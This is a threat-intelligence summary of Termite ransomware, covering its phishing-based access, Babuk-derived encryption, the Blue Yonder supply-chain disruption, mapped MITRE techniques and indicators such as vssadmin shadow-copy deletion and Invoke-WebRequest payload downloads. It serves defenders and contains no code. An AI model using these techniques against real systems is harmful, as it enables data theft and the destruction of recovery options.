Termite ransomware, emerging in Nov 2024, performs targeted attacks using phishing and exploits, combining data theft with file encryption. It disrupted global supply chain operations and mimics Babuk ransomware with advanced tactics to evade recovery. (Affected: Supply chain, multiple industries, global corporations)
Keypoints :
- Termite ransomware surfaced in November 2024 as a highly targeted threat impacting multiple sectors.
- Initial access commonly gained via phishing, compromised sites, or software vulnerabilities.
- Employs double extortion by encrypting files and exfiltrating data to pressure victims.
- Derived from Babuk ransomware code with enhanced environment-specific attack methods.
- Notably disrupted Blue Yonder, a global supply chain management provider, causing widespread impact.
- Overlap with CL0P ransomware observed but no confirmed connection exists between groups.
- AttackIQ released an emulation assessment template to help security teams test defenses against Termite.
- Key tactics include Ingress Tool Transfer, system and process discovery, and shadow copy deletion.
- Encryption uses ChaCha20 and ECDH Curve 25519 across network shares and local drives.
- Detection and mitigation focus on monitoring native utility abuse and preventing recovery inhibition.
MITRE Techniques :
- Ingress Tool Transfer (T1105) – Downloads and saves additional malware stages to disk or memory for further execution.
- Query Registry (T1012) – Accesses MachineGUID via registry key HKLMSOFTWAREMicrosoftCryptography to uniquely identify system.
- System Service Discovery (T1007) – Retrieves statuses of services using QueryServiceStatusEx and EnumDependentServices API calls.
- Process Discovery (T1057) – Enumerates active processes using CreateToolhelp32Snapshot and iterates via Process32FirstW/Process32NextW.
- Inhibit System Recovery (T1490) – Executes ‘vssadmin.exe’ to delete Volume Shadow Copies, disabling system recovery options.
- System Information Discovery (T1082) – Gathers hardware and system info using GetSystemInfo, FindFirstVolumeW, GetLogicalDrives, GetDriveTypeW API calls.
- Network Share Discovery (T1135) – Enumerates accessible network shares via NetShareEnum API call.
- File and Directory Discovery (T1083) – Enumerates files and directories using FindFirstFileW and FindNextFileW calls to locate targets for encryption.
- Data Encrypted for Impact (T1486) – Encrypts targeted files in-place using ChaCha20 and ECDH Curve 25519 cryptographic methods.
Indicator of Compromise :
- The article highlights command-line signatures where native tools like ‘vssadmin.exe’ are used with specific arguments to delete shadow copiesβan IOC for ransomware activity.
- PowerShell and CMD command patterns invoking web requests such as ‘Invoke-WebRequest’ used to download malicious payloads represent network-based IOCs.
- Registry key queries targeting MachineGUID present behavioral IOCs that can be monitored to identify reconnaissance.
- While no explicit IP addresses or hash values are given, detection focuses on usage patterns of common Windows API calls and system utilities abused by Termite.
Read more: https://www.attackiq.com/2025/05/08/emulating-termite-ransomware/
Views: 55